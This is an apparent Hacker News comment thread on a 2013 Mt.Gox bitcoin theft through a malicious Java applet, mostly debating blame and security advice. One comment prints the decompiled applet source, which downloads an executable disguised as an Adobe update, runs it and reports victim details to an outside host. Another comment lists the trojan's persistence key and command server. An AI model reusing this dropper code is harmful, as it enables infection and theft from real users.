from Hacker News

How I got robbed of 34 btc on Mt.Gox today

by pieter on 4/11/13, 11:39 AM with 243 comments

  • by RyanZAG on 4/11/13, 1:06 PM

    Isn't this exactly what Bitcoin was created for - to allow unregulated access to currency? I guess people don't really realize what unregulated actually means - and nor do they realize why you really do want regulated currency.

    This kind of thing happens all the time with real banks, but with real banks, all transactions can be traced and reversed. Law enforcement can follow the required documentation to find the owner of any account on a global level. This is exactly what Bitcoin was created to avoid.

    Well guess what? When you avoid the regulation, you take the safety of the currency into your own hands. MtGox should not refund this in any way shape or form. The problem was entirely his fault. He did not secure his MtGox account with available two-factor authentication. He ran untrusted code at full permission on his PC. He needs to take some responsibility for his own use of an unsecured currency on an unsecured website with unsecured authentication and running untrusted code.

    Zero sympathy from me. Maybe it will be a wake up call to others to actually think about their decisions. Shouting about the 'nanny state' and using bitcoin, and then turning around and looking for a nanny to help him out when he goes around it is pathetic.

  • by mootothemax on 4/11/13, 12:16 PM

    Mtgox has clearly not had time to respond, and I fear they will claim this is my fault as I have seen in other posts online that they say "report it to the police".

    They should compensate me 100%.

    This shows one of the fundamental problems with Bitcoin-related services: when people get taken advantage of, they expect to be compensated.

    While in the real world, banks will often compensate you if you're the victim of fraud, there isn't any equivalent for Bitcoin, despite people really expecting it.

  • by amanvir_sangha on 4/11/13, 12:48 PM

    Some basic analysis of the binary:

    Creates the following directories:

        %UserProfile%\537214
    %UserProfile%\684544
    %AppData%\dclogs
    Creates a new registry value (so that it runs every time on startup)

        [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
    537214 = "%UserProfile%\537214\svhost.exe"
    Tries to connect to:

        tamere123.no-ip.org on ports 80 and 1604
    The subdomain above leads to the following IP:

        198.203.29.120
    Which, according to iplocation.net is located in:

        Los Angeles
    California
    ISP: Hugeserver Networks Llc
    It's very unusual for malware to be hosted in USA so I would assume that either it is a compromised computer/bot or it is some script kiddie using his home connection, the latter is more likely since there were no exploits used just social engineering and luck.

    File hashes:

        MD5: 0x81F8E4C33ADECE6BF89EF171D9930282
    SHA-1: 0xF540BA6C5F1C2AA50B81A440E7D74F8CF588B4D7

  • by dreen on 4/11/13, 12:07 PM

    So... you ran a Java applet on a domain with mtgox in its name and didn't make sure that site is owned by MtGox?

    I'm sorry for your loss but what happened is your own fault entirely and I would be surprised if MtGox decides to refund you.

  • by Pezmc on 4/11/13, 12:07 PM

    TLDR; OP runs java applet (either in browser or downloaded it). Java applet sends bitcoin from OP's MtGox account to the 'hackers' bitcoin address, using the OP's browser, which was logged in to his MtGox account at the time.

  • by tripzilch on 4/11/13, 12:40 PM

    So, how about if you could have a Linux boot image onna stick, properly secured, no Java, several BitCoin apps preinstalled and optimized to boot extremely quickly into what would basically be a sort of BitCoin Wallet dashboard interface.

    You could plug in the USB, hibernate, flip the switch and be Bitcoin banking within seconds. Then unhibernate and get on with whatever you were doing on your day-to-day OS.

    That way it can be completely separate from whatever risky, dangerous and/or irresponsible things you do on a regular basis with your computer--things that seemingly are worth the risk as long as they don't directly give attackers access to thousands of $$$ digital cash.

    Question, I'm making a rough guess that a realistic speed-optimized fast boot-time for a Linux OS that doesn't need to do much is in the order of five seconds, is that about right? Also, I'm not 100% sure if that hibernation trick is actually possible, I've never really seen it on multi-boot systems and I wonder why, but from what I understand about hibernation (RAM gets saved to HD, restored next boot) the components are there?

    And, make it look unlike any other OS, to make users instantly aware if they're operating on their banking/money "inside the stick" or "out in the open" (on the regular OS). For instance, a glowy green CRT terminal filter.

  • by antr on 4/11/13, 12:10 PM

    I'm not doubting Bitcoin's potential to become a true currency, but unless this type of smash-and-grab situation can be traced/avoided/insured (whatever the right mechanism is) it is going to be extremely hard to make ordinary businesses and people use it. People don't place value in the currency itself, but the system that provides certain security around it.

  • by TazeTSchnitzel on 4/11/13, 12:20 PM

    From the source of mtgox-chat.info:

      <applet name='ChatBox' width='10' height='10' code='wDbIDcgeH.class' archive='wDbIDcgeH.jar'></applet>
    Yep, probably an exploit, there aren't many good reasons for a 10x10 applet. Let's download the jar. It contains a single 3.5KB payload. Let's use a Java decompiler (JD-GUI).

      import java.applet.Applet;
  import java.applet.AppletContext;
  import java.io.BufferedInputStream;
  import java.io.BufferedOutputStream;
  import java.io.FileNotFoundException;
  import java.io.FileOutputStream;
  import java.io.IOException;
  import java.net.InetAddress;
  import java.net.MalformedURLException;
  import java.net.URL;
  import java.util.logging.Level;
  import java.util.logging.Logger;

  public class wDbIDcgeH extends Applet
  {
    static String lik = "h?t?t?p?:?/?/?w?w?w?.?g?a?l?a?x?y?j?d?b?.?c?o?m?";

    public static void logme(String paramString)
    {
      String str1 = lik.replace("?", "");
      String str2 = "PoutineCoutu";
      try {
        String str3 = InetAddress.getLocalHost().getHostName().replace(" ", "-");
        URL localURL = new URL(str1 + "/insert.php?" + "&o=" + System.getProperty("os.name").replace(" ", "-") + "&u=" + str2 + "&ip=" + str3 + "&e=" + paramString);
        localURL.openStream();
      } catch (IOException localIOException) {
        localIOException.printStackTrace();
      }
    }

    public void start()
    {
      String str1 = "no";
      String str2 = System.getenv("APPDATA");
      String str3 = System.getProperty("java.io.tmpdir");
      String str4 = "http://g2f.nl/0lczsoo";
      String str5 = str2 + "\\";
      String str6 = "AdobeUpdate-Setup1.84##e";
      String str7 = "f.R.q.w.v.k.p.g.E.q.w.v.w";
      String str8 = "CodedByOrpheu";

      String str9 = str5.concat(str6.replace("##", ".ex"));
      BufferedInputStream localBufferedInputStream = null;
      try {
        localBufferedInputStream = new BufferedInputStream(new URL(str4.replace("##", ".ex")).openStream());
      } catch (IOException localIOException1) {
        if (str1 != "yes") logme("Noa");
        str1 = "yes";
        Logger.getLogger(wDbIDcgeH.class.getName()).log(Level.SEVERE, null, localIOException1);
      }

      FileOutputStream localFileOutputStream = null;
      try {
        localFileOutputStream = new FileOutputStream(str9);
      } catch (FileNotFoundException localFileNotFoundException) {
        Logger.getLogger(wDbIDcgeH.class.getName()).log(Level.SEVERE, null, localFileNotFoundException);
      }

      BufferedOutputStream localBufferedOutputStream = new BufferedOutputStream(localFileOutputStream, 1024);
      byte[] arrayOfByte = new byte[1024];
      try
      {
        int i;
        for (long l = 0L; (i = localBufferedInputStream.read(arrayOfByte)) != -1; l += i)
          localBufferedOutputStream.write(arrayOfByte, 0, i);
      }
      catch (IOException localIOException2) {
        if (str1 != "yes") logme("Noc");
        str1 = "yes";
        Logger.getLogger(wDbIDcgeH.class.getName()).log(Level.SEVERE, null, localIOException2);
      }
      try {
        localBufferedOutputStream.close();
      } catch (IOException localIOException3) {
        Logger.getLogger(wDbIDcgeH.class.getName()).log(Level.SEVERE, null, localIOException3);
      }
      try {
        localBufferedInputStream.close();
      } catch (IOException localIOException4) {
        Logger.getLogger(wDbIDcgeH.class.getName()).log(Level.SEVERE, null, localIOException4);
      }
      try {
        Runtime.getRuntime().exec(str9);
        logme("Yes");
      } catch (IOException localIOException5) {
        logme("Nod");
        Logger.getLogger(wDbIDcgeH.class.getName()).log(Level.SEVERE, null, localIOException5);
      }
      try
      {
        getAppletContext().showDocument(new URL("0"), "_self");
      } catch (MalformedURLException localMalformedURLException) {
        System.exit(0);

        localMalformedURLException.printStackTrace();
      }
    }

    public void init() {
      start();
    }
  }
    Well, I can't decipher that, but some security expert might be able to see what's going on.

  • by Cakez0r on 4/11/13, 12:23 PM

    He seems to think MtGox should compensate his loss, but I really don't see how it's their fault. The guy fell victim to a phishing scam, plain and simple. It was completely out of MtGox's hands.

  • by tripzilch on 4/11/13, 12:18 PM

    > I then discovered that the site is loaded with a java script which, based on an initial analysis by my java programmer friend, is a 0 day java exploit with a cross site injection attack, which automatically started

    "Being a techie", I like to confuse Java and Javascript ...

  • by fmavituna on 4/11/13, 12:19 PM

    A bit off topic, but if you care about security DO NOT INSTALL JAVA to your computer. I'm JAVA free for the last ~5 years and I never really needed it.

    Java's security track is horrible and it's quite popular target.

  • by smoyer on 4/11/13, 12:26 PM

    I wonder how much the of the increase in MtGox accounts and MtGox trading volume (discussed here: https://news.ycombinator.com/item?id=5529986) is due to this malware. If I was the author of this program, I'd spread the trading out over a large number of accounts and hit as many people as I could in a short time period (once the news gets out, this exploit will be much less effective).

  • by jack_trades on 4/11/13, 1:54 PM

    How useful is a "currency" if it 1) has volatility like a penny stock and 2) raises the stakes on 0-day defense to something ridiculous?

    When I hear interviews where people (bitcoin founder) suggest that you don't transfer into bitcoins any state currency you aren't willing to lose... it sort of peels the "inflation-hedge" covers off the whole thing. How unstable and unsecure does a currency have to be to be nearly worthless? USDollars look pretty safe again.

    This is so much a game of hacker gambling. A great experiment. Too bad it consumes so much productive time and energy.

    The beautiful narrative of the reclusive, open-society, eastern hacker that designs this thing which grows to be the godzilla it is... The story arc on bitcoin is borderline trite. Michael Bay is all over this in a year.

  • by amalag on 4/11/13, 1:17 PM

    Is funny that people throw around words like "java script 0 day exploit" and then post:

    >Then and there someone posted a link to www mtgox-chat info (do not open unless you know what >you are doing) claiming a video announcement that mtgox was going to start trading litecoins. >I clicked on the link, the website opened, not much happened, and the "video"/chatbox never loaded. >I then forgot about this website.

  • by sequoia on 4/11/13, 5:59 PM

    I'm really confused by the title, in particular the "on Mt.Gox" part. Was he "on Mt.Gox['s website]" when he came across this applet? He makes it sound like the exploit was on mt. gox.

    If he got a trojan on a third party site that compromised his computer and Mt. Gox's site had nothing to do with it, this title seems a bit libelous. If in fact that's the case, I'd implore HN mods to change the title to something that doesn't unfairly cast aspersions on the Mt.Gox site.

    FWIW: I have no bitcoins, I don't fully grok bitcoins, I'm scared of bitcoins, I don't use mt.gox or any vendor

  • by axefrog on 4/11/13, 12:30 PM

    MtGox really does run a subpar operation. There should be additional security checks when transferring money out of an account, and there should be the option to enable multifactor authentication. Back when they were originally hacked, this should have become top priority for them, along with making their service rock solid. If people are hacking and stealing from you, it's obvious you have something of value and need to take steps to protect what you have, especially when it's being held on behalf of a customer.

  • by Tarilo on 4/11/13, 12:12 PM

    This is exactly why everyone on the internet keeps saying that you shouldn't automatically run Java applets or shouldn't have Java installed at all on your computer.

    Java is just such a big target for hackers nowadays, that there will always be zero-days.

  • by plg on 4/11/13, 1:30 PM

    I'm having trouble understanding the OP's problem with mt. gox. Is it that the OP wants mt. gox to have somehow prevented him from downloading and running malicious java code from some other third party website? (WTF dude) or is it more specific, that the OP thinks mt. gox should have somehow prevented the OP's credentials from being sniffed by said malicious program?

  • by 0x0 on 4/11/13, 12:12 PM

    This is probably not much different from any other internet banking trojan horse delivered via a java exploit.

    Some banks solve this problem by requiring a 2 factor auth to confirm transactions (even after logging in).

  • by niggler on 4/11/13, 1:36 PM

    Best comment from the thread: "Friends don't let friends use Windows + Bitcoin."

  • by jes5199 on 4/11/13, 3:29 PM

    The non-reversibility of bitcoin transactions is a huge liability. Our current state of software technology was designed in a world where the most valuable/dangerous thing you could possibly have on your disk or on a web site was, what, your ssh keys? Nude photos of yourself?

    The value of hacking, phishing, etc is significantly increased by the presence of bitcoins.

    I guess you could argue that if bitcoins are popular, software practices will evolve to be much more secure - but until then, it's wild west, and much more wild than the internet ever was before.

  • by willvarfar on 4/11/13, 12:38 PM

    Is there a way that MtCox or somewhere could keep a blacklist of 'stolen' coins? So that they become worthless because nobody would be able to trade them?

  • by halcyondaze on 4/11/13, 5:48 PM

    No offense to bitcoiners, but what are people expecting when the biggest exchange is "Magic The Gathering Online Exchange" for this "currency" ?

  • by Tomdarkness on 4/11/13, 12:19 PM

    I've not used Mt.Gox but does it let you perform transactions without authenticating again? Even if you were logged in to your account, I'd expect any kind of financial related website to perform some kind of re-authentication before processing any transaction. Perhaps with the exception of transferring funds to somewhere you've sent funds in the past.

  • by wereHamster on 4/11/13, 1:21 PM

    "site is loaded with a java script" - srsly? You do ebanking (or ebitcoining) on a computer which has java installed?

  • by smoyer on 4/11/13, 12:16 PM

    Java Applets were designed to give you the ability to execute a program on your computer from the browser in much the same way ActiveX controls could be used for exploits. Turn off Java in the browser and hope that JavaScript is sandboxed well enough.

  • by egeozcan on 4/11/13, 12:09 PM

    I quite like the JVM but I think it should be stopped from running inside a browser.

  • by dan1234 on 4/11/13, 12:27 PM

    Doesn't Mt.Gox have any 2 factor auth when it comes to approving transfers?

  • by DanBC on 4/11/13, 12:16 PM

    At $200 per bitcoin, this is a $6,800 lesson in "Don't visit random websites".

    At least they were open about being robbed. I wonder how many bitcoins were stolen in total?

    EDIT: Has anyone visited the URL to analyse the malware?

  • by dariopy on 4/11/13, 2:47 PM

    Maybe I'm missing something something, but where exactly is the exploit here? (0-day no less)

    AFAIU, the user was prompted to accept an autosigned applet, and he did so. After that, the outcome was inevitable. You may hate java all you like, but it seems like the user (inadvertently) gave this program permission to steal all his money.

  • by parandroid on 4/11/13, 8:56 PM

    Actually, the only thing the hacker didn't do is ask the dude politely to give him (or her) the money. This wasn't a 0day bug, no XSS. The dude gave the hacker permission to run any code on his machine, therefore it's completely his own fault, and has nothing to do with MtGox.

  • by oomkiller on 4/11/13, 1:14 PM

    I uninstalled all of the Java plugins when the 0 days started coming out a couple months ago. If you want to be extra safe, you should probably have some sort of Linux LiveCD without any plugins enabled, that acts as a trusted environment for banking.

  • by supjeff on 4/11/13, 7:23 PM

    Why do people trust MtGox again? Didn't something similar to this happen a year or-so ago where everyone's money disappeared and the ops were like "Yeah we don't know what happened"? How do we know they aren't fleecing everyone?

  • by Osiris on 4/12/13, 12:28 AM

    I have a Yubikey account with MtGox. Withdrawals require a long-press of the key. If you have a significant amount of BTC in MtGox, I would recommend paying the $20 to get the two-factor authentication key for your account.

  • by ghshephard on 4/11/13, 2:31 PM

    This makes a lot more sense now:

    https://news.ycombinator.com/item?id=5530247

  • by pan69 on 4/11/13, 8:41 PM

    Doesn't MtGox send out an email or SMS with a verification code before a transfer can take place? Ouch...

  • by stesch on 4/11/13, 7:45 PM

    I get laughed at for using NoScript.

  • by onbitcoins on 4/11/13, 4:15 PM

    http://onbitcoins.com/2013/04/11/bitcoin-theft-mt-gox-trust/

    A Mt. Gox investor was surprised to see his account suddenly pillaged. Will Bitcoin theft call into question trust and confidence in the system?

  • by danmaz74 on 4/11/13, 5:57 PM

    Welcome to the far west...

  • by drivebyacct2 on 4/11/13, 8:00 PM

    Man, I'm getting tired of repeating these basic security issues:

    Stop storing your wallet online. And if not that, stop letting flash/java autoload/run. Both Chrome and Firefox have "click-to-enable". Not only is it more secure, it also prevents auto-video-playing, background audio you can't find and shit like this from happening.

  • by Jebbers on 4/11/13, 3:03 PM

    LOLarious.